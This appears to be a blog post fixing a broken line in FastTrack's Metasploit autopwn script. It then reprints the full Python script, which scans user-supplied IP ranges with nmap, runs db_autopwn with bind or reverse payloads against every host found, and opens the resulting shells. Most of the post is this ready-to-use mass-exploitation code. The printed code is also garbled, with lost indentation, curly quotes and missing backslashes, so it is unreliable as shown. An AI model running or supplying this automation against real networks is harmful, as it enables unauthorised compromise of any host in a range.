Autopwn Automation of FastTrack Bug

Seems like there’ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error:

.
.
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit3/msf3/plugins/db_sqlite3: Deprecated plugin
msf > db_driver sqlite3
[*] Using database driver sqlite3

One solution is to open up the Msfconsole and type the commands manually. But that kind of defeats the purpose of having FastTrack installed (in a limited way of course:p ). Fortunately, the fix is very easy. All you need to do is to modify the autopwn file in /pentest/exploits/fasttrack/bin/ftsrc directory. First open the file in any text editor of your choice and look for this line in bold:

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘load db_sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)

Now replace db_sqlite3 with db_driver sqlite3 and save the file.
Everything will work fine.

Alternatively you can copy-paste the following text in a text editor and save the file as “autopwn.py” (minus quotes) in directory /pentest/exploits/fasttrack/bin/ftsrc . You’ll need root access to replace the already existing file.

#!/usr/bin/env python
import pexpect,sys,os,time
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
try:
ipaddr=sys.argv[3]
except IndexError:
ipaddr=raw_input(“””
Metasploit Autopwn Automation

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit Framework and does
not modify the Metasploit Framework in anyway. This is simply to automate some tasks
from the autopwn feature already developed by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it’ll run against those hosts. Additionally you can place NMAP
commands within the autopwn ip ranges bar, for example, if you want to scan even if a
host “appears down” just do -PN 192.168.1.1-254 or whatever…you can use all NMap
syntaxes in the Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the ip ranges to autopwn: “””)
if ipaddr == ‘quit’ or ipaddr == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
# Spawn instance of msfconsole
try:
option1=sys.argv[4]
except IndexError:
option1=raw_input(“””
Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: “””)
if option1 == ‘quit’ or option1 == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
if option1 == ‘1’: option1=’-b’
if option1 == ‘2’: option1=’-r’
print “Launching MSFConsole and prepping autopwn…”
try:
counter=0
metapath=file(“%s/bin/setup/metasploitconfig.file” % (definepath)).readlines()
for line in metapath:
metapath=line.rstrip()
except IOError:
print “Configuration file not detected, running default path.”
print “Recommend running setup.py install to configure Fast-Track.”
print “Setting default directory…”
counter=0
# BT3
if os.path.isfile(“/pentest/exploits/framework3/msfconsole”):
metapath=”/pentest/exploits/framework3/”
counter=1
# NUbuntu
if os.path.isfile(“/tools/exploits/framework*/msfconsole”):
metapath=”/tools/exploits/framework*/”
counter=1
if counter == ‘0’:
print “Metasploit not detected..Exiting..”
sys.exit()

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘db_driver sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)
# run actual port scans
child1.sendline (”’db_nmap %s ”’ % (ipaddr))
# run actual exploitation
child1.sendline (‘db_autopwn -p -t -e %s’ % (option1))
child1.sendline (‘sleep 5’)
child1.sendline (‘jobs -K’)
child1.sendline (‘nnn’)
child1.sendline (‘sessions -l’)
child1.sendline (‘echo “If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell”‘)
# jump to pid
child1.interact()
except Exception: print “nExiting Fast-Track…n”

Leave a Reply